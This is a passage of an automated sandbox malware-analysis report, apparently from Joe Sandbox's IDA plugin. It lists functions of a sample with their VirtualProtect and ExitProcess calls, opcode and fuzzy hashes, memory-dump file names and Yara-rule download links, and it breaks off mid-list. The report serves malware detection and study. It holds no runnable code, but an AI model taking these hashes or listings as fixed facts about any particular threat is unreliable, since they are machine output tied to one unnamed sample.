                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ProtectVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 544645111-0
                                                                                                      • Opcode ID: b5f2d4923331193d5e379d471e7d1d5b28d541b9828bfd858803e4bf2a4535a1
                                                                                                      • Instruction ID: 80a9a06211689eb3e7595b3e949a21a1e1c9d640a9ff0e74d36b2d2fb8807a93
                                                                                                      • Opcode Fuzzy Hash: b5f2d4923331193d5e379d471e7d1d5b28d541b9828bfd858803e4bf2a4535a1
                                                                                                      • Instruction Fuzzy Hash: 69312DB1E091699FEB208A10DC90AEEB774FB85315F1481FAD80973241D6396FC1CF56
                                                                                                      Function 004076F3 Relevance: 1.6, APIs: 1, Instructions: 79memoryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • VirtualProtect.KERNELBASE(00000000,?,00000040,00000000,00000000,?,?,0040736D,00000001,?,0040736D,?,?,0040736D,00000000,00407357), ref: 00407A89
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ProtectVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 544645111-0
                                                                                                      • Opcode ID: 3b2ed96ee17431af822bca87dbd01a1e712f5358276e0c4ad421810d5a4f27a2
                                                                                                      • Instruction ID: 72d0355ec324682a34f76afb67a64c2f1b276f2ec9b776e952fe8073d308a23a
                                                                                                      • Opcode Fuzzy Hash: 3b2ed96ee17431af822bca87dbd01a1e712f5358276e0c4ad421810d5a4f27a2
                                                                                                      • Instruction Fuzzy Hash: D23152B1D19269ABEB248A10CC91AEAB774FB44315F1040FAE50E77280D7396FC1DF56
                                                                                                      Function 00407322 Relevance: 1.6, APIs: 1, Instructions: 71memoryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • VirtualProtect.KERNELBASE(00000000,?,00000040,00000000,00000000,?,?,0040736D,00000001,?,0040736D,?,?,0040736D,00000000,00407357), ref: 00407A89
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ProtectVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 544645111-0
                                                                                                      • Opcode ID: 41a1c91bf44ff0823540f4ca1287f885fbed504c90cfb04416be893a7a0c412f
                                                                                                      • Instruction ID: 8ec79926d99549b8ad09de660acc38468b744f3b89ead390b49cd44b63b2c5f6
                                                                                                      • Opcode Fuzzy Hash: 41a1c91bf44ff0823540f4ca1287f885fbed504c90cfb04416be893a7a0c412f
                                                                                                      • Instruction Fuzzy Hash: 272195F1D09155ABE7209A10DC91AEB7778EB84311F1440FAE90DB6280D63DBFC18E67
                                                                                                      Function 00406EE5 Relevance: 1.6, APIs: 1, Instructions: 71memoryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • VirtualProtect.KERNELBASE(00000000,?,00000040,00000000,00000000,?,?,0040736D,00000001,?,0040736D,?,?,0040736D,00000000,00407357), ref: 00407A89
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ProtectVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 544645111-0
                                                                                                      • Opcode ID: bbe1f79a460c54ea1a86a0fd638689677234e48eb685ae64db2e15a45f8b7d1c
                                                                                                      • Instruction ID: f6bc0aca32123d62afcec40cfdda64f1a57cedd340883fba051d0b6c1a242cb6
                                                                                                      • Opcode Fuzzy Hash: bbe1f79a460c54ea1a86a0fd638689677234e48eb685ae64db2e15a45f8b7d1c
                                                                                                      • Instruction Fuzzy Hash: 7F2195F1E09655ABE7208A50DC81AEB7778EB84311F1480FAE80D73680D63D6FC18E67
                                                                                                      Function 0040774E Relevance: 1.6, APIs: 1, Instructions: 67memoryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • VirtualProtect.KERNELBASE(00000000,?,00000040,00000000,00000000,?,?,0040736D,00000001,?,0040736D,?,?,0040736D,00000000,00407357), ref: 00407A89
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ProtectVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 544645111-0
                                                                                                      • Opcode ID: f161ad89eaa19193b6716ce992ad5ecda7b4055e3c388a122093723db6cf1515
                                                                                                      • Instruction ID: cad17b736f214b687b97d1c09dbc69d25f64b41f5976fc86232ee4344c202e0c
                                                                                                      • Opcode Fuzzy Hash: f161ad89eaa19193b6716ce992ad5ecda7b4055e3c388a122093723db6cf1515
                                                                                                      • Instruction Fuzzy Hash: 682153B1E09269ABE7248A10DC91AEAB774FB84311F1440FAE90D73240D6396FC1CF67
                                                                                                      Function 00407780 Relevance: 1.6, APIs: 1, Instructions: 67memoryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • VirtualProtect.KERNELBASE(00000000,?,00000040,00000000,00000000,?,?,0040736D,00000001,?,0040736D,?,?,0040736D,00000000,00407357), ref: 00407A89
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ProtectVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 544645111-0
                                                                                                      • Opcode ID: 4884bcb44bd0b5ad50cddc5af89fc62fa4cf02d492965a64e51bc6259cd281e3
                                                                                                      • Instruction ID: 15a7fd30f91fb788b0abb87cb7584b9936ecfea92e8d1b514a16577baa0ce10d
                                                                                                      • Opcode Fuzzy Hash: 4884bcb44bd0b5ad50cddc5af89fc62fa4cf02d492965a64e51bc6259cd281e3
                                                                                                      • Instruction Fuzzy Hash: 142153B1E09269ABE7208A10DC91AEAB774FB84311F1440FAE90D73240D6396FC1CF67
                                                                                                      Function 004077A5 Relevance: 1.6, APIs: 1, Instructions: 67memoryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • VirtualProtect.KERNELBASE(00000000,?,00000040,00000000,00000000,?,?,0040736D,00000001,?,0040736D,?,?,0040736D,00000000,00407357), ref: 00407A89
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ProtectVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 544645111-0
                                                                                                      • Opcode ID: f468ed99962ace134cccf1e473bee13d303ad56bc159aa76799ec2fb56823125
                                                                                                      • Instruction ID: a34256e20bd584245bec4423c30ed60b57e2983c4cf3ce1877f5d79146750205
                                                                                                      • Opcode Fuzzy Hash: f468ed99962ace134cccf1e473bee13d303ad56bc159aa76799ec2fb56823125
                                                                                                      • Instruction Fuzzy Hash: 772141B1E09269ABE7248A10DC91AEAB774FB84311F1440FAE90D73240D6396FC18F67
                                                                                                      Function 00407A47 Relevance: 1.6, APIs: 1, Instructions: 60memoryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • VirtualProtect.KERNELBASE(00000000,?,00000040,00000000,00000000,?,?,0040736D,00000001,?,0040736D,?,?,0040736D,00000000,00407357), ref: 00407A89
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ProtectVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 544645111-0
                                                                                                      • Opcode ID: 39a6b79f0e45fdaa712e502584fe76552a88ce7962590b40a4e73943d0586808
                                                                                                      • Instruction ID: 963abbb4cabe0683d0d60bd4a921d15a1e7f630ab47a36f0df739fa66add72f0
                                                                                                      • Opcode Fuzzy Hash: 39a6b79f0e45fdaa712e502584fe76552a88ce7962590b40a4e73943d0586808
                                                                                                      • Instruction Fuzzy Hash: 6C1193B1D09669ABD7209A50DC91AEBB778EB44311F1440FAE84DB3240D6396FC1CF67
                                                                                                      Function 0041EE47 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • ExitProcess.KERNEL32(00000000,?,0041E876,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 0041F488
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExitProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 621844428-0
                                                                                                      • Opcode ID: 15215fc46c5e5ae98283763b6bf2c90a584ba1b34151393dbfdd1787dcb58fab
                                                                                                      • Instruction ID: cb59a7782b4f85dcca487a1d6302194e1feb29a830f2551ff99fbf6f27c09858
                                                                                                      • Opcode Fuzzy Hash: 15215fc46c5e5ae98283763b6bf2c90a584ba1b34151393dbfdd1787dcb58fab
                                                                                                      • Instruction Fuzzy Hash: 281190F2D05218AFF724CA11DC44BFB7679FB80300F1084FAE5099A290D7789EC68E21
                                                                                                      Function 0041F064 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • ExitProcess.KERNEL32(00000000,?,0041E876,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 0041F488
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExitProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 621844428-0
                                                                                                      • Opcode ID: 3cdedd0c0f1c612ba524f877bdad41f8f88a7b810406b9948f7c065cf8142408
                                                                                                      • Instruction ID: e3c13079d7fce3fc5d29cd5bd24cbece3c2b2fe7ed385b817e7f45459d5e1981
                                                                                                      • Opcode Fuzzy Hash: 3cdedd0c0f1c612ba524f877bdad41f8f88a7b810406b9948f7c065cf8142408
                                                                                                      • Instruction Fuzzy Hash: 38119EF1E01214AFE7248A14DD54BEA7679FB94300F0080FAE60A9A290D6799EC28E20
                                                                                                      Function 0041EE63 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • ExitProcess.KERNEL32(00000000,?,0041E876,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 0041F488
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
